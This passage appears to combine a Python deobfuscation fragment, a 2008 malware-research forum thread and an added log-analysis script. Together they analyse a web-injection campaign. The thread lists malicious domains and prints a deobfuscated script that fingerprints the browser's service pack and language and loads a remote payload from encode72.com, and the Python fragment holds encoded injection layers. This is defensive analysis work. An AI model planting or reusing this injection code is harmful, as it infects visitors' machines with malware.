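EJFO = "KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B"
MKMO = "Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B"
Z3P = "0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B"
Z2LP = "cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B"

# Each entry: (encoded string, replace chain exactly as the script applies it)
LAYERS = {
    "EjFO": (EJFO, [("Ueq", "5"), ("KC", "%"), ("Vn0", "D")]),
    "Mkmo": (MKMO, [("Fpo", "%")]),
    "Z3p":  (Z3P,  [("ig", "z"), ("0dS", "N"), ("xzY", "2"), ("Nmi", "%")]),
    "z2lP": (Z2LP, [("f", "A"), ("V", "0"), ("El", "6"), ("cqe", "%"), ("%J", "8%")]),
}

def decode_all() -> dict:
    """Return {layer name: recovered JavaScript source} for every layer in LAYERS."""
    return {name: decode_layer(blob, reps) for name, (blob, reps) in LAYERS.items()}

if __name__ == "__main__":
    for name, code in decode_all().items():
        print(f"{name}: {code}")
```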

June 04, 2008, 12:47:52 pm
Reply #12

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Sorry I didn't ask for permission (my brain seems to be slower than my fingers), but I've posted the link to this malicious site on the MWR forum.
If antnet can't deobfuscate it, then I do not know who can do it.

June 04, 2008, 02:17:40 pm
Reply #13

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
New:
tjwh202.162.ns98.cn
nb88.cn
hxxp://www.exe94.com
hxxp://www.view89.com
hxxp://www.err68.com
hxxp://www.rundll841.com

Not injected, but related and definitely malicious (several of the above injections reference it):
sslput4.com
The Shadowserver Foundation

June 04, 2008, 02:58:08 pm
Reply #14

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I did take a look at rundll841.com
It does take a look at the system language settings, and it downloads malware according to these:
Code:
document.UhbtQqzm = 1;
document.Z3p0uYay = 1;
document.MSDKhOrw = 1;
if (!document.F9kJY0Ud) {
    var Nx3xniTR;
    // navigator.appMinorVersion is IE-only and carries the service pack, e.g. ";SP2;"
    var ALFsRXKd = navigator.appMinorVersion;
    var KDzpO8UG = -1;
    var aanTFP7g = "01";   // two-digit code, "01" = no service pack found
    while ((KDzpO8UG = ALFsRXKd.indexOf(";SP", KDzpO8UG + 1)) != -1) {
        var QfTUqtJd = ALFsRXKd.charAt(KDzpO8UG + 3);
        if (QfTUqtJd == "1")
            aanTFP7g = "02";
        else if (QfTUqtJd == "2")
            aanTFP7g = "03";
        else if (QfTUqtJd == "3")
            aanTFP7g = "04";
        else if (QfTUqtJd == "4")
            aanTFP7g = "05";
        else if (QfTUqtJd == "5")
            aanTFP7g = "06";
        else if (QfTUqtJd == "6")
            aanTFP7g = "07";
        if (aanTFP7g != "01")
            break;
    }
    if (aanTFP7g == "01" && ALFsRXKd.indexOf("Release Candidate", 0) != -1)
        aanTFP7g = "08";
    // hex-encode the first 10 characters of navigator.systemLanguage (IE-only), e.g. "en-us"
    var QzmzTMai = navigator.systemLanguage.substr(0, 10);
    var FEXGqg2V = "";
    for (var GPzlxy9a = 0; GPzlxy9a < QzmzTMai.length; GPzlxy9a++) {
        QOu110FA = QzmzTMai.charCodeAt(GPzlxy9a).toString(16);
        // compares the hex string itself, not its length, with 2, so this pad never fires
        // for printable characters (their hex form is always two digits)
        if (QOu110FA < 2)
            FEXGqg2V += "0";
        FEXGqg2V += QOu110FA;
    }
    while (FEXGqg2V.length < 20)   // pad the language field to 20 hex digits
        FEXGqg2V += "00";
    var Nx3xniTR = aanTFP7g + FEXGqg2V;   // fingerprint = SP code + hex language
    // inject a script tag whose URL carries the fingerprint; the server selects the
    // payload from the reported service pack and language
    var sIvWfaMT = document.createElement("script");
    sIvWfaMT.setAttribute("type", "text/javascript");
    sIvWfaMT.setAttribute("src", "http://encode72.com/cgi-bin/index.cgi?f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + Nx3xniTR);
    document.body.appendChild(sIvWfaMT);
}
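The fingerprint suffix the script above builds can be read back out of a proxy log, so a responder can see which IE service pack and system language each affected client reported. This is an added Python example, not code from the thread; the code table mirrors the script's branches, the 48-hex constant before the suffix is copied from it, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Constant query prefix copied from the posted script; the fingerprint follows it.
CGI_PREFIX = "f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff"
# Two-digit codes as assigned by the script's if/else chain.
SP_CODES = {"01": "none detected", "02": "SP1", "03": "SP2", "04": "SP3",
            "05": "SP4", "06": "SP5", "07": "SP6", "08": "Release Candidate"}

def decode_fingerprint(suffix: str):
    """Split '<2-digit SP code><hex systemLanguage, 00-padded to 20 digits>'."""
    if len(suffix) < 2 or len(suffix) % 2:
        return None
    sp, hexlang = suffix[:2], suffix[2:]
    try:
        lang = bytes.fromhex(hexlang).rstrip(b"\x00").decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return {"sp": SP_CODES.get(sp, "unknown code " + sp), "language": lang}

def fingerprint_from_url(url: str):
    """Return the decoded fingerprint if url is a call-back to the index.cgi endpoint."""
    parts = urlsplit(url)
    if not parts.path.endswith("/cgi-bin/index.cgi") or not parts.query.startswith(CGI_PREFIX):
        return None
    return decode_fingerprint(parts.query[len(CGI_PREFIX):])

def scan_log(lines):
    """Return [(client_ip, fingerprint)] for each proxy log line carrying a call-back."""
    hits = []
    for line in lines:
        m = re.search(r'^(\S+) .*"GET (\S+) HTTP', line)
        if m and (fp := fingerprint_from_url(m.group(2))):
            hits.append((m.group(1), fp))
    return hits

# Constructed sample proxy log: one SP2 / en-us client, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2008:14:00:00 +0000] "GET http://encode72.com/cgi-bin/index.cgi?'
    + CGI_PREFIX + '03656e2d75730000000000 HTTP/1.1" 200 812',
    '10.0.0.6 - - [04/Jun/2008:14:00:01 +0000] "GET http://example.test/index.html HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for ip, fp in scan_log(SAMPLE_LOG):
        print(ip, fp)
```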